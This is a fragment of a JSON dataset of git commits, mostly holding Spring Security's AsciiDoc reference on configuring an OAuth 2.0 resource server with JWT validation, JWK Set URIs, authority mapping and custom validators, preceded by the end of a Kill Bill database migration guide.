-password=<PASSWORD> -locations=filesystem:\/var\/folders\/XXX migrate\n\n----\n\n=== Java plugins\n\nJava plugins migrations also rely on https:\/\/flywaydb.org\/[Flyway] and follow a similar workflow than Kill Bill itself. They can be found in each plugin under `src\/main\/resources\/migration\/`.\n\nThe metadata table should be called `<plugin_name>_schema_version`. Make sure to specify `-table=<plugin_name>_schema_version` when invoking Flyway.\n\n=== Ruby plugins\n\nRuby plugins migrations rely on http:\/\/edgeguides.rubyonrails.org\/active_record_migrations.html[Active Record migrations]. Migrations are located under `db\/migrate\/`. You can use the `killbill-migration` tool (see above) to run the migrations.\n\nThe metadata table should be called `<plugin_name>_schema_migrations`, e.g.:\n\n[source,sql]\n----\nCREATE TABLE `cybersource_schema_migrations` (\n `version` varchar(255) NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8\n----\n\nNote: adapt the DDL for your RDBMS engine.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0bde3c5c8f6916dc4824c864ef1074a10c759d2a","subject":"Clarify ServerBearerExchangeFilterFunction Docs","message":"Clarify ServerBearerExchangeFilterFunction Docs\n\nFixes gh-8220\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/oauth2\/oauth2-resourceserver.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/oauth2\/oauth2-resourceserver.adoc","new_contents":"[[oauth2resourceserver]]\n== OAuth 2.0 Resource Server\n\nSpring Security supports protecting endpoints using two forms of OAuth 2.0 https:\/\/tools.ietf.org\/html\/rfc6750.html[Bearer Tokens]:\n\n* https:\/\/tools.ietf.org\/html\/rfc7519[JWT]\n* Opaque Tokens\n\nThis is handy in circumstances where an application has delegated its authority management to an https:\/\/tools.ietf.org\/html\/rfc6749[authorization server] (for example, Okta or Ping Identity).\nThis authorization server can be consulted by resource servers to authorize requests.\n\n[NOTE]\n====\nWorking samples for both {gh-samples-url}\/boot\/oauth2resourceserver[JWTs] and {gh-samples-url}\/boot\/oauth2resourceserver-opaque[Opaque Tokens] are available in the {gh-samples-url}[Spring Security repository].\n====\n\n=== Dependencies\n\nMost Resource Server support is collected into `spring-security-oauth2-resource-server`.\nHowever, the support for decoding and verifying JWTs is in `spring-security-oauth2-jose`, meaning that both are necessary in order to have a working resource server that supports JWT-encoded Bearer Tokens.\n\n[[oauth2resourceserver-jwt-minimalconfiguration]]\n=== Minimal Configuration for JWTs\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the location of the authorization server.\n\n==== Specifying the Authorization Server\n\nIn a Spring Boot application, to specify which authorization server to use, simply do:\n\n[source,yml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\/issuer\n----\n\nWhere `https:\/\/idp.example.com\/issuer` is the value contained in the `iss` claim for JWT tokens that the authorization server will issue.\nResource Server will use this property to further self-configure, discover the authorization server's public keys, and subsequently validate incoming JWTs.\n\n[NOTE]\nTo use the `issuer-uri` property, it must also be true that one of `https:\/\/idp.example.com\/issuer\/.well-known\/openid-configuration`, `https:\/\/idp.example.com\/.well-known\/openid-configuration\/issuer`, or `https:\/\/idp.example.com\/.well-known\/oauth-authorization-server\/issuer` is a supported endpoint for the authorization server.\nThis endpoint is referred to as a https:\/\/openid.net\/specs\/openid-connect-discovery-1_0.html#ProviderConfig[Provider Configuration] endpoint or a https:\/\/tools.ietf.org\/html\/rfc8414#section-3[Authorization Server Metadata] endpoint.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate JWT-encoded Bearer Tokens.\n\nIt achieves this through a deterministic startup process:\n\n1. Hit the Provider Configuration or Authorization Server Metadata endpoint, processing the response for the `jwks_url` property\n2. Configure the validation strategy to query `jwks_url` for valid public keys\n3. Configure the validation strategy to validate each JWTs `iss` claim against `https:\/\/idp.example.com`.\n\nA consequence of this process is that the authorization server must be up and receiving requests in order for Resource Server to successfully start up.\n\n[NOTE]\nIf the authorization server is down when Resource Server queries it (given appropriate timeouts), then startup will fail.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n[source,html]\n----\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n----\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven a well-formed JWT, Resource Server will:\n\n1. Validate its signature against a public key obtained from the `jwks_url` endpoint during startup and matched against the JWT\n2. Validate the JWT's `exp` and `nbf` timestamps and the JWT's `iss` claim, and\n3. Map each scope to an authority with the prefix `SCOPE_`.\n\n[NOTE]\nAs the authorization server makes available new keys, Spring Security will automatically rotate the keys used to validate JWTs.\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `Jwt` object, and `Authentication#getName` maps to the JWT's `sub` property, if one is present.\n\nFrom here, consider jumping to:\n\n<<oauth2resourceserver-jwt-jwkseturi,How to Configure without Tying Resource Server startup to an authorization server's availability>>\n\n<<oauth2resourceserver-jwt-sansboot,How to Configure without Spring Boot>>\n\n[[oauth2resourceserver-jwt-jwkseturi]]\n=== Specifying the Authorization Server JWK Set Uri Directly\n\nIf the authorization server doesn't support any configuration endpoints, or if Resource Server must be able to start up independently from the authorization server, then the `jwk-set-uri` can be supplied as well:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\n jwk-set-uri: https:\/\/idp.example.com\/.well-known\/jwks.json\n----\n\n[NOTE]\nThe JWK Set uri is not standardized, but can typically be found in the authorization server's documentation\n\nConsequently, Resource Server will not ping the authorization server at startup.\nWe still specify the `issuer-uri` so that Resource Server still validates the `iss` claim on incoming JWTs.\n\n[NOTE]\nThis property can also be supplied directly on the <<oauth2resourceserver-jwt-jwkseturi-dsl,DSL>>.\n\n[[oauth2resourceserver-jwt-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server. When including `spring-security-oauth2-jose`, this `WebSecurityConfigurerAdapter` looks like:\n\n.Default JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::jwt);\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nfun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt { }\n }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n.Custom JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwtAuthenticationConverter(myConverter())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_message:read\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwtAuthenticationConverter = myConverter()\n }\n }\n }\n }\n}\n----\n====\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is a `JwtDecoder`, which decodes `String` tokens into validated instances of `Jwt`:\n\n\n.JWT Decoder\n====\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return JwtDecoders.fromIssuerLocation(issuerUri);\n}\n----\n====\n\n[NOTE]\nCalling `{security-api-url}org\/springframework\/security\/oauth2\/jwt\/JwtDecoders.html#fromIssuerLocation-java.lang.String-[JwtDecoders#fromIssuerLocation]` is what invokes the Provider Configuration or Authorization Server Metadata endpoint in order to derive the JWK Set Uri.\n\nIf the application doesn't expose a `JwtDecoder` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `jwkSetUri()` or replaced using `decoder()`.\n\nOr, if you're not using Spring Boot at all, then both of these components - the filter chain and a `JwtDecoder` can be specified in XML.\n\nThe filter chain is specified like so:\n\n.Default JWT Configuration\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt decoder-ref=\"jwtDecoder\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nAnd the `JwtDecoder` like so:\n\n.JWT Decoder\n====\n.Xml\n[source,xml,role=\"primary\"]\n----\n<bean id=\"jwtDecoder\"\n class=\"org.springframework.security.oauth2.jwt.JwtDecoders\"\n factory-method=\"fromIssuerLocation\">\n <constructor-arg value=\"${spring.security.oauth2.resourceserver.jwt.jwk-set-uri}\"\/>\n<\/bean>\n----\n====\n\n[[oauth2resourceserver-jwt-jwkseturi-dsl]]\n==== Using `jwkSetUri()`\n\nAn authorization server's JWK Set Uri can be configured <<oauth2resourceserver-jwt-jwkseturi,as a configuration property>> or it can be supplied in the DSL:\n\n.JWK Set Uri Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwkSetUri(\"https:\/\/idp.example.com\/.well-known\/jwks.json\")\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwkSetUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwkSetUri = \"https:\/\/idp.example.com\/.well-known\/jwks.json\"\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.com\/.well-known\/jwks.json\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nUsing `jwkSetUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-jwt-decoder-dsl]]\n==== Using `decoder()`\n\nMore powerful than `jwkSetUri()` is `decoder()`, which will completely replace any Boot auto configuration of `JwtDecoder`:\n\n.JWT Decoder Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwtDecoder extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .decoder(myCustomDecoder())\n )\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwtDecoder : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt {\n jwtDecoder = myCustomDecoder()\n }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/**\" access=\"authenticated\"\/>\n <oauth2-resource-server>\n <jwt decoder-ref=\"myCustomDecoder\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-jwt-validation,validation>>, <<oauth2resourceserver-jwt-claimsetmapping,mapping>>, or <<oauth2resourceserver-jwt-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-jwt-decoder-bean]]\n==== Exposing a `JwtDecoder` `@Bean`\n\nOr, exposing a `JwtDecoder` `@Bean` has the same effect as `decoder()`:\n\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n}\n----\n\n[[oauth2resourceserver-jwt-decoder-algorithm]]\n=== Configuring Trusted Algorithms\n\nBy default, `NimbusJwtDecoder`, and hence Resource Server, will only trust and verify tokens using `RS256`.\n\nYou can customize this via <<oauth2resourceserver-jwt-boot-algorithm,Spring Boot>>, <<oauth2resourceserver-jwt-decoder-builder,the NimbusJwtDecoder builder>>, or from the <<oauth2resourceserver-jwt-decoder-jwk-response,JWK Set response>>.\n\n[[oauth2resourceserver-jwt-boot-algorithm]]\n==== Via Spring Boot\n\nThe simplest way to set the algorithm is as a property:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n jws-algorithm: RS512\n jwk-set-uri: https:\/\/idp.example.org\/.well-known\/jwks.json\n----\n\n[[oauth2resourceserver-jwt-decoder-builder]]\n==== Using a Builder\n\nFor greater power, though, we can use a builder that ships with `NimbusJwtDecoder`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.fromJwkSetUri(this.jwkSetUri)\n .jwsAlgorithm(RS512).build();\n}\n----\n\nCalling `jwsAlgorithm` more than once will configure `NimbusJwtDecoder` to trust more than one algorithm, like so:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.fromJwkSetUri(this.jwkSetUri)\n .jwsAlgorithm(RS512).jwsAlgorithm(EC512).build();\n}\n----\n\nOr, you can call `jwsAlgorithms`:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.fromJwkSetUri(this.jwkSetUri)\n .jwsAlgorithms(algorithms -> {\n algorithms.add(RS512);\n algorithms.add(EC512);\n }).build();\n}\n----\n\n[[oauth2resourceserver-jwt-decoder-jwk-response]]\n==== From JWK Set response\n\nSince Spring Security's JWT support is based off of Nimbus, you can use all it's great features as well.\n\nFor example, Nimbus has a `JWSKeySelector` implementation that will select the set of algorithms based on the JWK Set URI response.\nYou can use it to generate a `NimbusJwtDecoder` like so:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n \/\/ makes a request to the JWK Set endpoint\n JWSKeySelector<SecurityContext> jwsKeySelector =\n JWSAlgorithmFamilyJWSKeySelector.fromJWKSetURL(this.jwkSetUrl);\n\n DefaultJWTProcessor<SecurityContext> jwtProcessor =\n new DefaultJWTProcessor<>();\n jwtProcessor.setJWSKeySelector(jwsKeySelector);\n\n return new NimbusJwtDecoder(jwtProcessor);\n}\n```\n\n[[oauth2resourceserver-jwt-decoder-public-key]]\n=== Trusting a Single Asymmetric Key\n\nSimpler than backing a Resource Server with a JWK Set endpoint is to hard-code an RSA public key.\nThe public key can be provided via <<oauth2resourceserver-jwt-decoder-public-key-boot,Spring Boot>> or by <<oauth2resourceserver-jwt-decoder-public-key-builder,Using a Builder>>.\n\n[[oauth2resourceserver-jwt-decoder-public-key-boot]]\n==== Via Spring Boot\n\nSpecifying a key via Spring Boot is quite simple.\nThe key's location can be specified like so:\n\n[source,yaml]\n----\nspring:\n security:\n oauth2:\n resourceserver:\n jwt:\n public-key-location: classpath:my-key.pub\n----\n\nOr, to allow for a more sophisticated lookup, you can post-process the `RsaKeyConversionServicePostProcessor`:\n\n[source,java]\n----\n@Bean\nBeanFactoryPostProcessor conversionServiceCustomizer() {\n return beanFactory ->\n beanFactory.getBean(RsaKeyConversionServicePostProcessor.class)\n .setResourceLoader(new CustomResourceLoader());\n}\n----\n\nSpecify your key's location:\n\n```yaml\nkey.location: hfds:\/\/my-key.pub\n```\n\nAnd then autowire the value:\n\n```java\n@Value(\"${key.location}\")\nRSAPublicKey key;\n```\n\n[[oauth2resourceserver-jwt-decoder-public-key-builder]]\n==== Using a Builder\n\nTo wire an `RSAPublicKey` directly, you can simply use the appropriate `NimbusJwtDecoder` builder, like so:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withPublicKey(this.key).build();\n}\n```\n\n[[oauth2resourceserver-jwt-decoder-secret-key]]\n=== Trusting a Single Symmetric Key\n\nUsing a single symmetric key is also simple.\nYou can simply load in your `SecretKey` and use the appropriate `NimbusJwtDecoder` builder, like so:\n\n[source,java]\n----\n@Bean\npublic JwtDecoder jwtDecoder() {\n return NimbusJwtDecoder.withSecretKey(this.key).build();\n}\n----\n\n[[oauth2resourceserver-jwt-authorization]]\n=== Configuring Authorization\n\nA JWT that is issued from an OAuth 2.0 Authorization Server will typically either have a `scope` or `scp` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from a JWT, the corresponding expressions should include this prefix:\n\n.Authorization Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(OAuth2ResourceServerConfigurer::jwt);\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass DirectlyConfiguredJwkSetUri : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/contacts\/**\", hasAuthority(\"SCOPE_contacts\"))\n authorize(\"\/messages\/**\", hasAuthority(\"SCOPE_messages\"))\n authorize(anyRequest, authenticated)\n }\n oauth2ResourceServer {\n jwt { }\n }\n }\n }\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\/>\n <\/oauth2-resource-server>\n<\/http>\n----\n====\n\nOr similarly with method security:\n\n[source,java]\n----\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) {}\n----\n\n[[oauth2resourceserver-jwt-authorization-extraction]]\n==== Extracting Authorities Manually\n\nHowever, there are a number of circumstances where this default is insufficient.\nFor example, some authorization servers don't use the `scope` attribute, but instead have their own custom attribute.\nOr, at other times, the resource server may need to adapt the attribute or a composition of attributes into internalized authorities.\n\nTo this end, the DSL exposes `jwtAuthenticationConverter()`, which is responsible for converting a `Jwt` into an `Authentication`.\n\nAs part of its configuration, we can supply a subsidiary converter to go from `Jwt` to a `Collection` of granted authorities.\nLet's say that that your authorization server communicates authorities in a custom claim called `authorities`.\nIn that case, you can configure the claim that `JwtAuthenticationConverter` should inspect, like so:\n\n.Authorities Claim Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class CustomAuthoritiesClaimName extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2 -> oauth2\n .jwt(jwt -> jwt\n .jwtAuthenticationConverter(jwtAuthenticationConverter())\n )\n );\n }\n}\n\nJwtAuthenticationConverter jwtAuthenticationConverter() {\n JwtGrantedAuthoritiesConverter grantedAuthoritiesConverter = new JwtGrantedAuthoritiesConverter();\n grantedAuthoritiesConverter.setAuthoritiesClaimName(\"authorities\");\n\n JwtAuthenticationConverter authenticationConverter = new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter(authoritiesConverter);\n return jwtAuthenticationConverter;\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\n jwt-authentication-converter-ref=\"jwtAuthenticationConverter\"\/>\n <\/oauth2-resource-server>\n<\/http>\n\n<bean id=\"jwtAuthenticationConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtAuthenticationConverter\">\n <property name=\"jwtGrantedAuthoritiesConverter\" ref=\"jwtGrantedAuthoritiesConverter\"\/>\n<\/bean>\n\n<bean id=\"jwtGrantedAuthoritiesConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtGrantedAuthoritiesConverter\">\n <property name=\"authoritiesClaimName\" value=\"authorities\"\/>\n<\/bean>\n----\n====\n\nYou can also configure the authority prefix to be different as well.\nInstead of prefixing each authority with `SCOPE_`, you can change it to `ROLE_` like so:\n\n.Authorities Prefix Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nJwtAuthenticationConverter jwtAuthenticationConverter() {\n JwtGrantedAuthoritiesConverter grantedAuthoritiesConverter = new JwtGrantedAuthoritiesConverter();\n grantedAuthoritiesConverter.setAuthorityPrefix(\"ROLE_\");\n\n JwtAuthenticationConverter authenticationConverter = new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter(authoritiesConverter);\n return jwtAuthenticationConverter;\n}\n----\n\n.Xml\n[source,xml,role=\"secondary\"]\n----\n<http>\n <intercept-uri pattern=\"\/contacts\/**\" access=\"hasAuthority('SCOPE_contacts')\"\/>\n <intercept-uri pattern=\"\/messages\/**\" access=\"hasAuthority('SCOPE_messages')\"\/>\n <oauth2-resource-server>\n <jwt jwk-set-uri=\"https:\/\/idp.example.org\/.well-known\/jwks.json\"\n jwt-authentication-converter-ref=\"jwtAuthenticationConverter\"\/>\n <\/oauth2-resource-server>\n<\/http>\n\n<bean id=\"jwtAuthenticationConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtAuthenticationConverter\">\n <property name=\"jwtGrantedAuthoritiesConverter\" ref=\"jwtGrantedAuthoritiesConverter\"\/>\n<\/bean>\n\n<bean id=\"jwtGrantedAuthoritiesConverter\"\n class=\"org.springframework.security.oauth2.server.resource.authentication.JwtGrantedAuthoritiesConverter\">\n <property name=\"authorityPrefix\" value=\"ROLE_\"\/>\n<\/bean>\n----\n====\n\nOr, you can remove the prefix altogether by calling `JwtGrantedAuthoritiesConverter#setAuthorityPrefix(\"\")`.\n\nFor more flexibility, the DSL supports entirely replacing the converter with any class that implements `Converter<Jwt, AbstractAuthenticationToken>`:\n\n[source,java]\n----\nstatic class CustomAuthenticationConverter implements Converter<Jwt, AbstractAuthenticationToken> {\n public AbstractAuthenticationToken convert(Jwt jwt) {\n return new CustomAuthenticationToken(jwt);\n }\n}\n----\n\n[[oauth2resourceserver-jwt-validation]]\n=== Configuring Validation\n\nUsing <<oauth2resourceserver-jwt-minimalconfiguration,minimal Spring Boot configuration>>, indicating the authorization server's issuer uri, Resource Server will default to verifying the `iss` claim as well as the `exp` and `nbf` timestamp claims.\n\nIn circumstances where validation needs to be customized, Resource Server ships with two standard validators and also accepts custom `OAuth2TokenValidator` instances.\n\n[[oauth2resourceserver-jwt-validation-clockskew]]\n==== Customizing Timestamp Validation\n\nJWT's typically have a window of validity, with the start of the window indicated in the `nbf` claim and the end indicated in the `exp` claim.\n\nHowever, every server can experience clock drift, which can cause tokens to appear expired to one server, but not to another.\nThis can cause some implementation heartburn as the number of collaborating servers increases in a distributed system.\n\nResource Server uses `JwtTimestampValidator` to verify a token's validity window, and it can be configured with a `clockSkew` to alleviate the above problem:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> withClockSkew = new DelegatingOAuth2TokenValidator<>(\n new JwtTimestampValidator(Duration.ofSeconds(60)),\n new IssuerValidator(issuerUri));\n\n jwtDecoder.setJwtValidator(withClockSkew);\n\n return jwtDecoder;\n}\n----\n\n[NOTE]\nBy default, Resource Server configures a clock skew of 30 seconds.\n\n[[oauth2resourceserver-jwt-validation-custom]]\n==== Configuring a Custom Validator\n\nAdding a check for the `aud` claim is simple with the `OAuth2TokenValidator` API:\n\n[source,java]\n----\nOAuth2TokenValidator<Jwt> audienceValidator() {\n return new JwtClaimValidator<List<String>>(AUD, aud -> aud.contains(\"messaging\"));\n}\n----\n\nOr, for more control you can implement your own `OAuth2TokenValidator`:\n\n[source,java]\n----\nstatic class AudienceValidator implements OAuth2TokenValidator<Jwt> {\n OAuth2Error error = new OAuth2Error(\"custom_code\", \"Custom error message\", null);\n\n @Override\n public OAuth2TokenValidatorResult validate(Jwt jwt) {\n if (jwt.getAudience().contains(\"messaging\")) {\n return OAuth2TokenValidatorResult.success();\n } else {\n return OAuth2TokenValidatorResult.failure(error);\n }\n }\n}\n\n\/\/ ...\n\nOAuth2TokenValidator<Jwt> audienceValidator() {\n return new AudienceValidator();\n}\n----\n\nThen, to add into a resource server, it's a matter of specifying the `JwtDecoder` instance:\n\n[source,java]\n----\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> audienceValidator = audienceValidator();\n OAuth2TokenValidator<Jwt> withIssuer = JwtValidators.createDefaultWithIssuer(issuerUri);\n OAuth2TokenValidator<Jwt> withAudience = new DelegatingOAuth2TokenValidator<>(withIssuer, audienceValidator);\n\n jwtDecoder.setJwtValidator(withAudience);\n\n return jwtDecoder;\n}\n----\n\n[[oauth2resourceserver-jwt-claimsetmapping]]\n=== Configuring Claim Set Mapping\n\nSpring Security uses the https:\/\/bitbucket.org\/connect2id\/nimbus-jose-jwt\/wiki\/Home[Nimbus] library for parsing JWTs and validating their signatures.\nConsequently, Spring Security is subject to Nimbus's interpretation of each field value and how to coerce each into a Java type.\n\nFor example, because Nimbus remains Java 7 compatible, it doesn't use `Instant` to represent timestamp fields.\n\nAnd it's entirely possible to use a different library or for JWT processing, which may make its own coercion decisions that need adjustment.\n\nOr, quite simply, a resource server may want to add or remove claims from a JWT for domain-specific reasons.\n\nFor these purposes, Resource Server supports mapping the JWT claim set with `MappedJwtClaimSetConverter`.\n\n[[oauth2resourceserver-jwt-claimsetmapping-singleclaim]]\n==== Customizing the Conversion of a Single Claim\n\nBy default, `MappedJwtClaimSetConverter` will attempt to coerce claims into the following types:\n\n|============\n| Claim | Java Type\n| `aud` | `Collection<String>`\n| `exp` | `Instant`\n| `iat` | `Instant`\n| `iss` | `String`\n| `jti` | `String`\n| `nbf` | `Instant`\n| `sub` | `String`\n|============\n\nAn individual claim's conversion strategy can be configured using `MappedJwtClaimSetConverter.withDefaults`:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = NimbusJwtDecoder.withJwkSetUri(jwkSetUri).build();\n\n MappedJwtClaimSetConverter converter = MappedJwtClaimSetConverter\n .withDefaults(Collections.singletonMap(\"sub\", this::lookupUserIdBySub));\n jwtDecoder.setClaimSetConverter(converter);\n\n return jwtDecoder;\n}\n```\nThis will keep all the defaults, except it will override the default claim converter for `sub`.\n\n[[oauth2resourceserver-jwt-claimsetmapping-add]]\n==== Adding a Claim\n\n`MappedJwtClaimSetConverter` can also be used to add a custom claim, for example, to adapt to an existing system:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"custom\", custom -> \"value\"));\n```\n\n[[oauth2resourceserver-jwt-claimsetmapping-remove]]\n==== Removing a Claim\n\nAnd removing a claim is also simple, using the same API:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"legacyclaim\", legacy -> null));\n```\n\n[[oauth2resourceserver-jwt-claimsetmapping-rename]]\n==== Renaming a Claim\n\nIn more sophisticated scenarios, like consulting multiple claims at once or renaming a claim, Resource Server accepts any class that implements `Converter<Map<String, Object>, Map<String,Object>>`:\n\n```java\npublic class UsernameSubClaimAdapter implements Converter<Map<String, Object>, Map<String, Object>> {\n private final MappedJwtClaimSetConverter delegate =\n MappedJwtClaimSetConverter.withDefaults(Collections.emptyMap());\n\n public Map<String, Object> convert(Map<String, Object> claims) {\n Map<String, Object> convertedClaims = 